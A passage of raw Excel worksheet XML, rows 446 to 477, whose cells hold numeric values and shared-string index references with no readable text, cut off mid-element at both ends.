        <v>1</v>
      </c>
      <c r="G446" s="6">
        <v>404</v>
      </c>
      <c r="H446" s="11" t="s">
        <v>383</v>
      </c>
      <c r="I446" s="6">
        <v>504</v>
      </c>
      <c r="J446" s="6">
        <v>420</v>
      </c>
      <c r="K446" s="6">
        <v>0</v>
      </c>
      <c r="L446" s="6">
        <v>331</v>
      </c>
      <c r="M446" s="6">
        <v>69134</v>
      </c>
      <c r="N446" s="11"/>
      <c r="O446" s="11"/>
      <c r="P446" s="11" t="s">
        <v>1021</v>
      </c>
    </row>
    <row r="447" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A447" s="3">
        <v>445</v>
      </c>
      <c r="B447" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C447" s="11" t="s">
        <v>1022</v>
      </c>
      <c r="D447" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E447" s="14" t="s">
        <v>1023</v>
      </c>
      <c r="F447" s="6">
        <v>1</v>
      </c>
      <c r="G447" s="6">
        <v>404</v>
      </c>
      <c r="H447" s="11" t="s">
        <v>383</v>
      </c>
      <c r="I447" s="6">
        <v>500</v>
      </c>
      <c r="J447" s="6">
        <v>429</v>
      </c>
      <c r="K447" s="6">
        <v>0</v>
      </c>
      <c r="L447" s="6">
        <v>331</v>
      </c>
      <c r="M447" s="6">
        <v>69134</v>
      </c>
      <c r="N447" s="11"/>
      <c r="O447" s="11"/>
      <c r="P447" s="11" t="s">
        <v>1024</v>
      </c>
    </row>
    <row r="448" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A448" s="3">
        <v>446</v>
      </c>
      <c r="B448" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C448" s="11" t="s">
        <v>1022</v>
      </c>
      <c r="D448" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E448" s="14" t="s">
        <v>1025</v>
      </c>
      <c r="F448" s="6">
        <v>1</v>
      </c>
      <c r="G448" s="6">
        <v>404</v>
      </c>
      <c r="H448" s="11" t="s">
        <v>383</v>
      </c>
      <c r="I448" s="6">
        <v>516</v>
      </c>
      <c r="J448" s="6">
        <v>438</v>
      </c>
      <c r="K448" s="6">
        <v>0</v>
      </c>
      <c r="L448" s="6">
        <v>331</v>
      </c>
      <c r="M448" s="6">
        <v>69134</v>
      </c>
      <c r="N448" s="11"/>
      <c r="O448" s="11"/>
      <c r="P448" s="11" t="s">
        <v>1026</v>
      </c>
    </row>
    <row r="449" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A449" s="3">
        <v>447</v>
      </c>
      <c r="B449" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C449" s="11" t="s">
        <v>1022</v>
      </c>
      <c r="D449" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E449" s="14" t="s">
        <v>1027</v>
      </c>
      <c r="F449" s="6">
        <v>1</v>
      </c>
      <c r="G449" s="6">
        <v>404</v>
      </c>
      <c r="H449" s="11" t="s">
        <v>383</v>
      </c>
      <c r="I449" s="6">
        <v>524</v>
      </c>
      <c r="J449" s="6">
        <v>448</v>
      </c>
      <c r="K449" s="6">
        <v>0</v>
      </c>
      <c r="L449" s="6">
        <v>331</v>
      </c>
      <c r="M449" s="6">
        <v>69134</v>
      </c>
      <c r="N449" s="11"/>
      <c r="O449" s="11"/>
      <c r="P449" s="11" t="s">
        <v>1028</v>
      </c>
    </row>
    <row r="450" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A450" s="3">
        <v>448</v>
      </c>
      <c r="B450" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C450" s="11" t="s">
        <v>1022</v>
      </c>
      <c r="D450" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E450" s="14" t="s">
        <v>1029</v>
      </c>
      <c r="F450" s="6">
        <v>1</v>
      </c>
      <c r="G450" s="6">
        <v>404</v>
      </c>
      <c r="H450" s="11" t="s">
        <v>383</v>
      </c>
      <c r="I450" s="6">
        <v>533</v>
      </c>
      <c r="J450" s="6">
        <v>458</v>
      </c>
      <c r="K450" s="6">
        <v>0</v>
      </c>
      <c r="L450" s="6">
        <v>331</v>
      </c>
      <c r="M450" s="6">
        <v>69134</v>
      </c>
      <c r="N450" s="11"/>
      <c r="O450" s="11"/>
      <c r="P450" s="11" t="s">
        <v>1030</v>
      </c>
    </row>
    <row r="451" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A451" s="3">
        <v>449</v>
      </c>
      <c r="B451" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C451" s="11" t="s">
        <v>1022</v>
      </c>
      <c r="D451" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E451" s="14" t="s">
        <v>1031</v>
      </c>
      <c r="F451" s="6">
        <v>1</v>
      </c>
      <c r="G451" s="6">
        <v>404</v>
      </c>
      <c r="H451" s="11" t="s">
        <v>383</v>
      </c>
      <c r="I451" s="6">
        <v>530</v>
      </c>
      <c r="J451" s="6">
        <v>467</v>
      </c>
      <c r="K451" s="6">
        <v>0</v>
      </c>
      <c r="L451" s="6">
        <v>331</v>
      </c>
      <c r="M451" s="6">
        <v>69134</v>
      </c>
      <c r="N451" s="11"/>
      <c r="O451" s="11"/>
      <c r="P451" s="11" t="s">
        <v>1032</v>
      </c>
    </row>
    <row r="452" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A452" s="3">
        <v>450</v>
      </c>
      <c r="B452" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C452" s="11" t="s">
        <v>1022</v>
      </c>
      <c r="D452" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E452" s="14" t="s">
        <v>1033</v>
      </c>
      <c r="F452" s="6">
        <v>1</v>
      </c>
      <c r="G452" s="6">
        <v>404</v>
      </c>
      <c r="H452" s="11" t="s">
        <v>383</v>
      </c>
      <c r="I452" s="6">
        <v>514</v>
      </c>
      <c r="J452" s="6">
        <v>476</v>
      </c>
      <c r="K452" s="6">
        <v>0</v>
      </c>
      <c r="L452" s="6">
        <v>331</v>
      </c>
      <c r="M452" s="6">
        <v>69134</v>
      </c>
      <c r="N452" s="11"/>
      <c r="O452" s="11"/>
      <c r="P452" s="11" t="s">
        <v>1034</v>
      </c>
    </row>
    <row r="453" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A453" s="3">
        <v>451</v>
      </c>
      <c r="B453" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C453" s="11" t="s">
        <v>1022</v>
      </c>
      <c r="D453" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E453" s="14" t="s">
        <v>1035</v>
      </c>
      <c r="F453" s="6">
        <v>1</v>
      </c>
      <c r="G453" s="6">
        <v>404</v>
      </c>
      <c r="H453" s="11" t="s">
        <v>383</v>
      </c>
      <c r="I453" s="6">
        <v>511</v>
      </c>
      <c r="J453" s="6">
        <v>486</v>
      </c>
      <c r="K453" s="6">
        <v>0</v>
      </c>
      <c r="L453" s="6">
        <v>331</v>
      </c>
      <c r="M453" s="6">
        <v>69134</v>
      </c>
      <c r="N453" s="11"/>
      <c r="O453" s="11"/>
      <c r="P453" s="11" t="s">
        <v>1036</v>
      </c>
    </row>
    <row r="454" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A454" s="3">
        <v>452</v>
      </c>
      <c r="B454" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C454" s="11" t="s">
        <v>1022</v>
      </c>
      <c r="D454" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E454" s="14" t="s">
        <v>1037</v>
      </c>
      <c r="F454" s="6">
        <v>1</v>
      </c>
      <c r="G454" s="6">
        <v>404</v>
      </c>
      <c r="H454" s="11" t="s">
        <v>383</v>
      </c>
      <c r="I454" s="6">
        <v>504</v>
      </c>
      <c r="J454" s="6">
        <v>495</v>
      </c>
      <c r="K454" s="6">
        <v>0</v>
      </c>
      <c r="L454" s="6">
        <v>331</v>
      </c>
      <c r="M454" s="6">
        <v>69134</v>
      </c>
      <c r="N454" s="11"/>
      <c r="O454" s="11"/>
      <c r="P454" s="11" t="s">
        <v>1038</v>
      </c>
    </row>
    <row r="455" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A455" s="3">
        <v>453</v>
      </c>
      <c r="B455" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C455" s="11" t="s">
        <v>1022</v>
      </c>
      <c r="D455" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E455" s="14" t="s">
        <v>1039</v>
      </c>
      <c r="F455" s="6">
        <v>1</v>
      </c>
      <c r="G455" s="6">
        <v>404</v>
      </c>
      <c r="H455" s="11" t="s">
        <v>383</v>
      </c>
      <c r="I455" s="6">
        <v>560</v>
      </c>
      <c r="J455" s="6">
        <v>504</v>
      </c>
      <c r="K455" s="6">
        <v>0</v>
      </c>
      <c r="L455" s="6">
        <v>331</v>
      </c>
      <c r="M455" s="6">
        <v>69134</v>
      </c>
      <c r="N455" s="11"/>
      <c r="O455" s="11"/>
      <c r="P455" s="11" t="s">
        <v>1040</v>
      </c>
    </row>
    <row r="456" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A456" s="3">
        <v>454</v>
      </c>
      <c r="B456" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C456" s="11" t="s">
        <v>1022</v>
      </c>
      <c r="D456" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E456" s="14" t="s">
        <v>1041</v>
      </c>
      <c r="F456" s="6">
        <v>1</v>
      </c>
      <c r="G456" s="6">
        <v>404</v>
      </c>
      <c r="H456" s="11" t="s">
        <v>383</v>
      </c>
      <c r="I456" s="6">
        <v>591</v>
      </c>
      <c r="J456" s="6">
        <v>514</v>
      </c>
      <c r="K456" s="6">
        <v>0</v>
      </c>
      <c r="L456" s="6">
        <v>331</v>
      </c>
      <c r="M456" s="6">
        <v>69134</v>
      </c>
      <c r="N456" s="11"/>
      <c r="O456" s="11"/>
      <c r="P456" s="11" t="s">
        <v>1042</v>
      </c>
    </row>
    <row r="457" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A457" s="3">
        <v>455</v>
      </c>
      <c r="B457" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C457" s="11" t="s">
        <v>1043</v>
      </c>
      <c r="D457" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E457" s="14" t="s">
        <v>1044</v>
      </c>
      <c r="F457" s="6">
        <v>1</v>
      </c>
      <c r="G457" s="6">
        <v>404</v>
      </c>
      <c r="H457" s="11" t="s">
        <v>383</v>
      </c>
      <c r="I457" s="6">
        <v>621</v>
      </c>
      <c r="J457" s="6">
        <v>524</v>
      </c>
      <c r="K457" s="6">
        <v>0</v>
      </c>
      <c r="L457" s="6">
        <v>331</v>
      </c>
      <c r="M457" s="6">
        <v>69134</v>
      </c>
      <c r="N457" s="11"/>
      <c r="O457" s="11"/>
      <c r="P457" s="11" t="s">
        <v>1045</v>
      </c>
    </row>
    <row r="458" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A458" s="3">
        <v>456</v>
      </c>
      <c r="B458" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C458" s="11" t="s">
        <v>1043</v>
      </c>
      <c r="D458" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E458" s="14" t="s">
        <v>1046</v>
      </c>
      <c r="F458" s="6">
        <v>1</v>
      </c>
      <c r="G458" s="6">
        <v>404</v>
      </c>
      <c r="H458" s="11" t="s">
        <v>383</v>
      </c>
      <c r="I458" s="6">
        <v>643</v>
      </c>
      <c r="J458" s="6">
        <v>534</v>
      </c>
      <c r="K458" s="6">
        <v>0</v>
      </c>
      <c r="L458" s="6">
        <v>331</v>
      </c>
      <c r="M458" s="6">
        <v>69134</v>
      </c>
      <c r="N458" s="11"/>
      <c r="O458" s="11"/>
      <c r="P458" s="11" t="s">
        <v>1047</v>
      </c>
    </row>
    <row r="459" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A459" s="3">
        <v>457</v>
      </c>
      <c r="B459" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C459" s="11" t="s">
        <v>1043</v>
      </c>
      <c r="D459" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E459" s="14" t="s">
        <v>1048</v>
      </c>
      <c r="F459" s="6">
        <v>1</v>
      </c>
      <c r="G459" s="6">
        <v>404</v>
      </c>
      <c r="H459" s="11" t="s">
        <v>383</v>
      </c>
      <c r="I459" s="6">
        <v>658</v>
      </c>
      <c r="J459" s="6">
        <v>544</v>
      </c>
      <c r="K459" s="6">
        <v>0</v>
      </c>
      <c r="L459" s="6">
        <v>331</v>
      </c>
      <c r="M459" s="6">
        <v>69134</v>
      </c>
      <c r="N459" s="11"/>
      <c r="O459" s="11"/>
      <c r="P459" s="11" t="s">
        <v>1049</v>
      </c>
    </row>
    <row r="460" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A460" s="3">
        <v>458</v>
      </c>
      <c r="B460" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C460" s="11" t="s">
        <v>1043</v>
      </c>
      <c r="D460" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E460" s="14" t="s">
        <v>1050</v>
      </c>
      <c r="F460" s="6">
        <v>1</v>
      </c>
      <c r="G460" s="6">
        <v>404</v>
      </c>
      <c r="H460" s="11" t="s">
        <v>383</v>
      </c>
      <c r="I460" s="6">
        <v>637</v>
      </c>
      <c r="J460" s="6">
        <v>554</v>
      </c>
      <c r="K460" s="6">
        <v>0</v>
      </c>
      <c r="L460" s="6">
        <v>331</v>
      </c>
      <c r="M460" s="6">
        <v>69134</v>
      </c>
      <c r="N460" s="11"/>
      <c r="O460" s="11"/>
      <c r="P460" s="11" t="s">
        <v>1051</v>
      </c>
    </row>
    <row r="461" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A461" s="3">
        <v>459</v>
      </c>
      <c r="B461" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C461" s="11" t="s">
        <v>1043</v>
      </c>
      <c r="D461" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E461" s="14" t="s">
        <v>1052</v>
      </c>
      <c r="F461" s="6">
        <v>1</v>
      </c>
      <c r="G461" s="6">
        <v>404</v>
      </c>
      <c r="H461" s="11" t="s">
        <v>383</v>
      </c>
      <c r="I461" s="6">
        <v>648</v>
      </c>
      <c r="J461" s="6">
        <v>355</v>
      </c>
      <c r="K461" s="6">
        <v>0</v>
      </c>
      <c r="L461" s="6">
        <v>331</v>
      </c>
      <c r="M461" s="6">
        <v>69134</v>
      </c>
      <c r="N461" s="11"/>
      <c r="O461" s="11"/>
      <c r="P461" s="11" t="s">
        <v>1053</v>
      </c>
    </row>
    <row r="462" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A462" s="3">
        <v>460</v>
      </c>
      <c r="B462" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C462" s="11" t="s">
        <v>1043</v>
      </c>
      <c r="D462" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E462" s="14" t="s">
        <v>1054</v>
      </c>
      <c r="F462" s="6">
        <v>1</v>
      </c>
      <c r="G462" s="6">
        <v>404</v>
      </c>
      <c r="H462" s="11" t="s">
        <v>383</v>
      </c>
      <c r="I462" s="6">
        <v>620</v>
      </c>
      <c r="J462" s="6">
        <v>382</v>
      </c>
      <c r="K462" s="6">
        <v>0</v>
      </c>
      <c r="L462" s="6">
        <v>331</v>
      </c>
      <c r="M462" s="6">
        <v>69134</v>
      </c>
      <c r="N462" s="11"/>
      <c r="O462" s="11"/>
      <c r="P462" s="11" t="s">
        <v>1055</v>
      </c>
    </row>
    <row r="463" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A463" s="3">
        <v>461</v>
      </c>
      <c r="B463" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C463" s="11" t="s">
        <v>1043</v>
      </c>
      <c r="D463" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E463" s="14" t="s">
        <v>1056</v>
      </c>
      <c r="F463" s="6">
        <v>1</v>
      </c>
      <c r="G463" s="6">
        <v>404</v>
      </c>
      <c r="H463" s="11" t="s">
        <v>383</v>
      </c>
      <c r="I463" s="6">
        <v>601</v>
      </c>
      <c r="J463" s="6">
        <v>391</v>
      </c>
      <c r="K463" s="6">
        <v>0</v>
      </c>
      <c r="L463" s="6">
        <v>331</v>
      </c>
      <c r="M463" s="6">
        <v>69134</v>
      </c>
      <c r="N463" s="11"/>
      <c r="O463" s="11"/>
      <c r="P463" s="11" t="s">
        <v>1057</v>
      </c>
    </row>
    <row r="464" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A464" s="3">
        <v>462</v>
      </c>
      <c r="B464" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C464" s="11" t="s">
        <v>1043</v>
      </c>
      <c r="D464" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E464" s="14" t="s">
        <v>1058</v>
      </c>
      <c r="F464" s="6">
        <v>1</v>
      </c>
      <c r="G464" s="6">
        <v>404</v>
      </c>
      <c r="H464" s="11" t="s">
        <v>383</v>
      </c>
      <c r="I464" s="6">
        <v>585</v>
      </c>
      <c r="J464" s="6">
        <v>400</v>
      </c>
      <c r="K464" s="6">
        <v>0</v>
      </c>
      <c r="L464" s="6">
        <v>331</v>
      </c>
      <c r="M464" s="6">
        <v>69134</v>
      </c>
      <c r="N464" s="11"/>
      <c r="O464" s="11"/>
      <c r="P464" s="11" t="s">
        <v>1059</v>
      </c>
    </row>
    <row r="465" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A465" s="3">
        <v>463</v>
      </c>
      <c r="B465" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C465" s="11" t="s">
        <v>1060</v>
      </c>
      <c r="D465" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E465" s="14" t="s">
        <v>1061</v>
      </c>
      <c r="F465" s="6">
        <v>1</v>
      </c>
      <c r="G465" s="6">
        <v>404</v>
      </c>
      <c r="H465" s="11" t="s">
        <v>383</v>
      </c>
      <c r="I465" s="6">
        <v>547</v>
      </c>
      <c r="J465" s="6">
        <v>409</v>
      </c>
      <c r="K465" s="6">
        <v>0</v>
      </c>
      <c r="L465" s="6">
        <v>331</v>
      </c>
      <c r="M465" s="6">
        <v>69134</v>
      </c>
      <c r="N465" s="11"/>
      <c r="O465" s="11"/>
      <c r="P465" s="11" t="s">
        <v>1062</v>
      </c>
    </row>
    <row r="466" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A466" s="3">
        <v>464</v>
      </c>
      <c r="B466" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C466" s="11" t="s">
        <v>1060</v>
      </c>
      <c r="D466" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E466" s="14" t="s">
        <v>1063</v>
      </c>
      <c r="F466" s="6">
        <v>1</v>
      </c>
      <c r="G466" s="6">
        <v>404</v>
      </c>
      <c r="H466" s="11" t="s">
        <v>383</v>
      </c>
      <c r="I466" s="6">
        <v>497</v>
      </c>
      <c r="J466" s="6">
        <v>418</v>
      </c>
      <c r="K466" s="6">
        <v>0</v>
      </c>
      <c r="L466" s="6">
        <v>331</v>
      </c>
      <c r="M466" s="6">
        <v>69134</v>
      </c>
      <c r="N466" s="11"/>
      <c r="O466" s="11"/>
      <c r="P466" s="11" t="s">
        <v>1064</v>
      </c>
    </row>
    <row r="467" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A467" s="3">
        <v>465</v>
      </c>
      <c r="B467" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C467" s="11" t="s">
        <v>1060</v>
      </c>
      <c r="D467" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E467" s="14" t="s">
        <v>1065</v>
      </c>
      <c r="F467" s="6">
        <v>1</v>
      </c>
      <c r="G467" s="6">
        <v>404</v>
      </c>
      <c r="H467" s="11" t="s">
        <v>383</v>
      </c>
      <c r="I467" s="6">
        <v>493</v>
      </c>
      <c r="J467" s="6">
        <v>427</v>
      </c>
      <c r="K467" s="6">
        <v>0</v>
      </c>
      <c r="L467" s="6">
        <v>331</v>
      </c>
      <c r="M467" s="6">
        <v>69134</v>
      </c>
      <c r="N467" s="11"/>
      <c r="O467" s="11"/>
      <c r="P467" s="11" t="s">
        <v>1066</v>
      </c>
    </row>
    <row r="468" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A468" s="3">
        <v>466</v>
      </c>
      <c r="B468" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C468" s="11" t="s">
        <v>1060</v>
      </c>
      <c r="D468" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E468" s="14" t="s">
        <v>1067</v>
      </c>
      <c r="F468" s="6">
        <v>1</v>
      </c>
      <c r="G468" s="6">
        <v>404</v>
      </c>
      <c r="H468" s="11" t="s">
        <v>383</v>
      </c>
      <c r="I468" s="6">
        <v>479</v>
      </c>
      <c r="J468" s="6">
        <v>436</v>
      </c>
      <c r="K468" s="6">
        <v>0</v>
      </c>
      <c r="L468" s="6">
        <v>331</v>
      </c>
      <c r="M468" s="6">
        <v>69134</v>
      </c>
      <c r="N468" s="11"/>
      <c r="O468" s="11"/>
      <c r="P468" s="11" t="s">
        <v>1068</v>
      </c>
    </row>
    <row r="469" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A469" s="3">
        <v>467</v>
      </c>
      <c r="B469" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C469" s="11" t="s">
        <v>1060</v>
      </c>
      <c r="D469" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E469" s="14" t="s">
        <v>1069</v>
      </c>
      <c r="F469" s="6">
        <v>1</v>
      </c>
      <c r="G469" s="6">
        <v>404</v>
      </c>
      <c r="H469" s="11" t="s">
        <v>383</v>
      </c>
      <c r="I469" s="6">
        <v>494</v>
      </c>
      <c r="J469" s="6">
        <v>446</v>
      </c>
      <c r="K469" s="6">
        <v>0</v>
      </c>
      <c r="L469" s="6">
        <v>331</v>
      </c>
      <c r="M469" s="6">
        <v>69134</v>
      </c>
      <c r="N469" s="11"/>
      <c r="O469" s="11"/>
      <c r="P469" s="11" t="s">
        <v>1070</v>
      </c>
    </row>
    <row r="470" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A470" s="3">
        <v>468</v>
      </c>
      <c r="B470" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C470" s="11" t="s">
        <v>1060</v>
      </c>
      <c r="D470" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E470" s="14" t="s">
        <v>1071</v>
      </c>
      <c r="F470" s="6">
        <v>1</v>
      </c>
      <c r="G470" s="6">
        <v>404</v>
      </c>
      <c r="H470" s="11" t="s">
        <v>383</v>
      </c>
      <c r="I470" s="6">
        <v>507</v>
      </c>
      <c r="J470" s="6">
        <v>456</v>
      </c>
      <c r="K470" s="6">
        <v>0</v>
      </c>
      <c r="L470" s="6">
        <v>331</v>
      </c>
      <c r="M470" s="6">
        <v>69134</v>
      </c>
      <c r="N470" s="11"/>
      <c r="O470" s="11"/>
      <c r="P470" s="11" t="s">
        <v>1072</v>
      </c>
    </row>
    <row r="471" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A471" s="3">
        <v>469</v>
      </c>
      <c r="B471" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C471" s="11" t="s">
        <v>1060</v>
      </c>
      <c r="D471" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E471" s="14" t="s">
        <v>1073</v>
      </c>
      <c r="F471" s="6">
        <v>1</v>
      </c>
      <c r="G471" s="6">
        <v>404</v>
      </c>
      <c r="H471" s="11" t="s">
        <v>383</v>
      </c>
      <c r="I471" s="6">
        <v>557</v>
      </c>
      <c r="J471" s="6">
        <v>465</v>
      </c>
      <c r="K471" s="6">
        <v>0</v>
      </c>
      <c r="L471" s="6">
        <v>331</v>
      </c>
      <c r="M471" s="6">
        <v>69134</v>
      </c>
      <c r="N471" s="11"/>
      <c r="O471" s="11"/>
      <c r="P471" s="11" t="s">
        <v>1074</v>
      </c>
    </row>
    <row r="472" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A472" s="3">
        <v>470</v>
      </c>
      <c r="B472" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C472" s="11" t="s">
        <v>1060</v>
      </c>
      <c r="D472" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E472" s="14" t="s">
        <v>1075</v>
      </c>
      <c r="F472" s="6">
        <v>1</v>
      </c>
      <c r="G472" s="6">
        <v>404</v>
      </c>
      <c r="H472" s="11" t="s">
        <v>383</v>
      </c>
      <c r="I472" s="6">
        <v>653</v>
      </c>
      <c r="J472" s="6">
        <v>474</v>
      </c>
      <c r="K472" s="6">
        <v>0</v>
      </c>
      <c r="L472" s="6">
        <v>331</v>
      </c>
      <c r="M472" s="6">
        <v>69134</v>
      </c>
      <c r="N472" s="11"/>
      <c r="O472" s="11"/>
      <c r="P472" s="11" t="s">
        <v>1076</v>
      </c>
    </row>
    <row r="473" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A473" s="3">
        <v>471</v>
      </c>
      <c r="B473" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C473" s="11" t="s">
        <v>1060</v>
      </c>
      <c r="D473" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E473" s="14" t="s">
        <v>1077</v>
      </c>
      <c r="F473" s="6">
        <v>1</v>
      </c>
      <c r="G473" s="6">
        <v>404</v>
      </c>
      <c r="H473" s="11" t="s">
        <v>383</v>
      </c>
      <c r="I473" s="6">
        <v>660</v>
      </c>
      <c r="J473" s="6">
        <v>484</v>
      </c>
      <c r="K473" s="6">
        <v>0</v>
      </c>
      <c r="L473" s="6">
        <v>331</v>
      </c>
      <c r="M473" s="6">
        <v>69134</v>
      </c>
      <c r="N473" s="11"/>
      <c r="O473" s="11"/>
      <c r="P473" s="11" t="s">
        <v>1078</v>
      </c>
    </row>
    <row r="474" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A474" s="3">
        <v>472</v>
      </c>
      <c r="B474" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C474" s="11" t="s">
        <v>1079</v>
      </c>
      <c r="D474" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E474" s="14" t="s">
        <v>1080</v>
      </c>
      <c r="F474" s="6">
        <v>1</v>
      </c>
      <c r="G474" s="6">
        <v>404</v>
      </c>
      <c r="H474" s="11" t="s">
        <v>383</v>
      </c>
      <c r="I474" s="6">
        <v>658</v>
      </c>
      <c r="J474" s="6">
        <v>493</v>
      </c>
      <c r="K474" s="6">
        <v>0</v>
      </c>
      <c r="L474" s="6">
        <v>331</v>
      </c>
      <c r="M474" s="6">
        <v>69134</v>
      </c>
      <c r="N474" s="11"/>
      <c r="O474" s="11"/>
      <c r="P474" s="11" t="s">
        <v>1081</v>
      </c>
    </row>
    <row r="475" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A475" s="3">
        <v>473</v>
      </c>
      <c r="B475" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C475" s="11" t="s">
        <v>1079</v>
      </c>
      <c r="D475" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E475" s="14" t="s">
        <v>1082</v>
      </c>
      <c r="F475" s="6">
        <v>1</v>
      </c>
      <c r="G475" s="6">
        <v>404</v>
      </c>
      <c r="H475" s="11" t="s">
        <v>383</v>
      </c>
      <c r="I475" s="6">
        <v>669</v>
      </c>
      <c r="J475" s="6">
        <v>502</v>
      </c>
      <c r="K475" s="6">
        <v>0</v>
      </c>
      <c r="L475" s="6">
        <v>331</v>
      </c>
      <c r="M475" s="6">
        <v>69134</v>
      </c>
      <c r="N475" s="11"/>
      <c r="O475" s="11"/>
      <c r="P475" s="11" t="s">
        <v>1083</v>
      </c>
    </row>
    <row r="476" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A476" s="3">
        <v>474</v>
      </c>
      <c r="B476" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C476" s="11" t="s">
        <v>1079</v>
      </c>
      <c r="D476" s="11" t="s">
        <v>18</v>
      </c>
      <c r="E476" s="14" t="s">
        <v>1084</v>
      </c>
      <c r="F476" s="6">
        <v>1</v>
      </c>
      <c r="G476" s="6">
        <v>404</v>
      </c>
      <c r="H476" s="11" t="s">
        <v>383</v>
      </c>
      <c r="I476" s="6">
        <v>682</v>
      </c>
      <c r="J476" s="6">
        <v>512</v>
      </c>
      <c r="K476" s="6">
        <v>0</v>
      </c>
      <c r="L476" s="6">
        <v>331</v>
      </c>
      <c r="M476" s="6">
        <v>69134</v>
      </c>
      <c r="N476" s="11"/>
      <c r="O476" s="11"/>
      <c r="P476" s="11" t="s">
        <v>1085</v>
      </c>
    </row>
    <row r="477" spans="1:16" ht="15.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A477" s="3">
        <v>475</v>
      </c>
      <c r="B477" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C477" s="11" t="s">
        <v>1079</v>
      </c>
      <c r="D477" s="11" t="s">
        <v>18</v>
      </c>
